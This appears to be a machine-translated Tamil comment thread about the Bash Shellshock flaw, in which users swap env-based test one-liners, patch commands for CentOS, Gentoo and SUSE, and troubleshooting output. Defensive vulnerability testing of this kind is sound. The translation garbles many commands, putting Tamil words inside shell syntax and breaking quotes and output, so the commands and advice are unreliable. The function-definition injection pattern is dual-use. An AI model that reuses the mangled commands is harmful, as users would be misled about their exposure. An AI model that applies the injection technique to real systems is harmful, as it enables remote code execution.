ஊழியர்கள் நீங்கள் cgi உடன் ஒரு அப்பாச்சியைப் பயன்படுத்தினால், http தலைப்புகளை குக்கீகளாக வைக்கவும் அல்லது நீங்கள் செயல்படுத்த விரும்பும் செயல்பாட்டை பரிந்துரைக்கவும். இது புழுக்களை பரப்புவதற்கு கூட பயன்படுத்தப்பட்டுள்ளது.
யாராவது ஒரு சேவையகத்திற்கு ஒரு ஷெல் வைத்தால் mishell.php, அந்த விஷயத்தில் அது தீவிரமாக இல்லை, இல்லையா?
உங்களுடன் உடன்படுகிறேன். இது ஹார்ட்லெட்டில் உள்ளதைப் போன்ற ஒரு பெரிய பிழை என்று நான் நினைத்தேன் (என்எஸ்ஏ கூட நோயுற்ற தன்மையைத் தூண்டியது), ஆனால் எல்லாவற்றிற்கும் மேலாக இது ஒரு சிறிய பிழை.
ஃப்ளாஷ் பைத்தியம் நுகர்வு மற்றும் பெப்பர் ஃப்ளாஷ் பிளேயரில் செயல்திறன் வீழ்ச்சி மற்றும் ஏற்கனவே சரி செய்யப்பட்ட ஒன்று போன்ற மிகவும் தீவிரமான பிழைகள் உள்ளன Chrome மற்றும் Firefox இல் webRTC பிழை.
லினக்ஸ் புதினா 16 ஐக் கொண்டவர்களுக்கு இது ஒரு ஏற்பாடு உள்ளதா என்பது உங்களுக்குத் தெரியுமா?
டெபியன் சோதனையில் அது ஏற்கனவே சரி செய்யப்பட்டது.
எனது 5 டிஸ்ட்ரோக்களில் இது தீர்க்கப்படுகிறது, எனது OS X இல் எனக்குத் தெரியாது.
தயவுசெய்து எனது கருத்தை தணிக்கை செய்ய வேண்டாம், நான் OS X என்றேன். இந்த தளத்தில் OS X ஐ நீங்கள் கூற முடியுமா என்று எனக்குத் தெரியவில்லை.
@yoyo நன்றாக பேட்ச் செய்ய வேண்டாம், அவர்கள் இன்னும் பேட்சின் சில விவரங்களை வேலை செய்கிறார்கள் ... இதை முயற்சி செய்து சொல்லுங்கள், XD நடக்கவும்
env x = '() {:;}; எதிரொலி பாதிக்கப்படக்கூடிய 'பாஷ்-சி "எதிரொலி நான் ஐபோன் 6 குப்பைகளை விட மிகவும் பாதிக்கப்படக்கூடியவன்"
OS X க்கு முன்பு அவர்கள் அதை 100% தீர்த்துக் கொண்டால் நான் எதையும் பந்தயம் கட்டுவேன்
நல்லது, ஆர்ஸ் டெக்னிகாவில் கூட அவர்கள் OSX இல் பாஷுக்கு பொருத்தமாக இருக்கிறார்கள்.
AM ஸ்பாம் க்கான OS X இல் yoyo அடுத்த கருத்து .. lla tu save ..
மேற்கோள்களை சரிசெய்ய அங்கேயோ ... ஆனால் மீதமுள்ளவை உங்களுக்குத் தெரியும்
எஃப்.எஸ்.எஃப் பேசியது
https://fsf.org/news/free-software-foundation-statement-on-the-gnu-bash-shellshock-vulnerability
அவர்கள் OSX உடன் ஆதரவாக மாறியது போல (OSX இன்னும் பாஷைப் பயன்படுத்துவதால்: v).
எப்படியிருந்தாலும், நான் டெபியன் ஜெஸ்ஸியுடன் அவ்வளவு குழப்பமடைய வேண்டியதில்லை.
சென்ட் ஓஎஸ்ஸில் கணினி பாதிக்கப்படக்கூடியதாக இருந்தால்:
எல்லாவற்றையும் சுத்தம் செய்யுங்கள் && yum update bash
பாஷ் பதிப்பைக் காண:
rpm -qa | கிரேப் பேஷ்
பதிப்பு பாஷ் -4.1.2-15.el6_5.1 ஐ விட முந்தையதாக இருந்தால், உங்கள் கணினி பாதிக்கப்படக்கூடும்!
வாழ்த்துக்கள்.
2 வது பாதிப்பு இன்னும் தீர்க்கப்படவில்லை
env amvariable2 = '() {(a) => sh' sh -c "echo amVulnerable"; bash -c "எதிரொலி தோல்வி 2 இணைக்கப்படாதது"
புதுப்பித்தல் ...
ஜென்டூவில் எனக்கு நேர்மாறாக நடக்கிறது, நான் முதல் தோல்விக்கு மட்டுமே பாதிக்கப்படுகிறேன், ஆனால் இரண்டாவதாக இதைப் பெறுகிறேன்:
[குறியீடு] sh: X: வரி 1: எதிர்பாராத உறுப்புக்கு அருகிலுள்ள தொடரியல் பிழை `= '
sh: X: வரி 1: ''
sh: `X 'க்கான செயல்பாட்டு வரையறையை இறக்குமதி செய்வதில் பிழை
sh: பாதிக்கப்படக்கூடிய: கட்டளை கிடைக்கவில்லை
பிழை 2 இணைக்கப்படவில்லை
[/ குறியீடு]
பிழைகள் சரி செய்யப்பட்ட பாஷின் நிலையான பதிப்பு ஏற்கனவே இருக்குமா என்று எனக்குத் தெரியவில்லை, ஆனால் அடுத்த முறை நான் வெளிப்படும் போது அது நிலுவையில் இருக்கும்-ஒத்திசைவு & & வெளிவரும் –அப்புத்தேர்வு –தீப் –வித்-பி.டி.பி.எஸ் = மற்றும் - புதிய பயன்பாடு @ உலகம் (முழு அமைப்பையும் நான் புதுப்பிப்பது எப்படி).
பதிப்பு 4.2_p50 உடன் எனக்கு ஜென்டூ உள்ளது, இதுவரை இது எல்லா சோதனைகளையும் கடந்துவிட்டது. வளர்ந்து வரும்-ஒத்திசைவை முயற்சிக்கவும், பின்னர் -av1 பயன்பாட்டு-குண்டுகள் / பாஷை வெளிப்படுத்தவும், பின்னர் உங்களிடம் பதிப்பு 4.2_p50 உள்ளதா என சரிபார்க்கவும்.
இதை முயற்சித்தீர்களா?
புதிய தொகுப்புகளுடன், Red Hat எங்களுக்கு வழங்கும் ஒரு புதிய சோதனை
cd / tmp; rm -f / tmp / echo; env 'x = () {(a) => bas' bash -c "echo date"; cat / tmp / echo
எங்கள் கணினி பாதிக்கப்படாமல் இருந்தால், சரியாக இணைக்கப்பட்டிருந்தால், இது எங்களுக்கு இதுபோன்ற ஒன்றைக் கொடுக்க வேண்டும்
1 தேதி
2 பூனை: / tmp / echo: கோப்பு அல்லது அடைவு இல்லை
இந்த வழியில் முயற்சிக்கவும்:
env X = '() {(a) => sh' sh -c "எதிரொலி பாதிக்கப்படக்கூடியது"; bash -c "எதிரொலி தோல்வி 2 இணைக்கப்பட்டுள்ளது"
நான் பெறுகிறேன்
பாதிக்கப்படக்கூடிய
பிழை 2 இணைக்கப்பட்டது.
அதை மறந்துவிடு, வரி மோசமாக வடிவமைக்கப்பட்டுள்ளது.
சிறந்தது! எனது ஸ்லாக்வேரில் நான் ஏற்கனவே புதுப்பிப்பைச் செய்தேன், நன்றி!
ஹாய், ஒரு கேள்வி எழுகிறது, என்னிடம் "SUSE Linux Enterprise Server 10" 64-பிட் பல சேவையகங்கள் உள்ளன.
நான் பாதிக்கப்படக்கூடிய கட்டளைகளை இயக்கும்போது, ஐபோன் 6 எக்ஸ்.டி குப்பைகளை விட நான் மிகவும் பாதிக்கப்படக்கூடியவன்
SUSE இல் தொகுப்புகளை புதுப்பிப்பது / நிறுவுவது நான் தவறாக இல்லாவிட்டால், அது «zypper command கட்டளையுடன் செய்யப்படுகிறது.
சில சேவையகங்களில் இது என்னிடம் கூறுகிறது:
பயால்: z # ஜிப்பர் அப்
-bash: zypper: கட்டளை கிடைக்கவில்லை
பயால்: ~ #
மற்றவர்களில் இது:
SMB: ~ # zypper up
கணினி மூலங்களை மீட்டமைக்கிறது…
SUSE லினக்ஸ் எண்டர்பிரைஸ் சர்வர் 10 SP2-20100319-161944 க்கான மெட்டாடேட்டாவை பாகுபடுத்துகிறது…
RPM தரவுத்தளத்தை பாகுபடுத்துதல் ...
சுருக்கம்:
செய்வதற்கு ஒன்றுமில்லை.
நான் என்ன செய்வது?
சிலர் அதை வர்ணம் பூசுவதை விட பாதிப்பு குறைவாக இருப்பதாக நான் அறிவேன், ஆனால் என்னிடம் அது இருக்கிறது, நான் சிறியதாகவோ அல்லது பெரியதாகவோ இருந்தாலும் ஆபத்துக்கு ஆளாக விரும்பவில்லை.
வாழ்த்துக்கள்.
நல்ல மாலை, கட்டுரையில் நீங்கள் வழங்கிய குறியீட்டை ஒட்ட முயற்சித்தேன், இதைப் பெறுகிறேன்
sanders @ pc-sanders: ~ $ env x = '() {:;}; எதிரொலி பாதிக்கப்படக்கூடிய 'பாஷ்-சி "எதிரொலி இது ஒரு சோதனை"
இது ஒரு சோதனை
சாண்டர்ஸ் @ பிசி-சாண்டர்ஸ்: ~ $
டிஸ்ட்ரோவை எவ்வாறு இணைப்பது என்பதை தயவுசெய்து எனக்கு விளக்குவீர்களா, நான் தினமும் புதுப்பிக்கிறேன், உடனடி வெளியீட்டில் எந்த மாற்றங்களையும் நான் காணவில்லை.
நன்றி!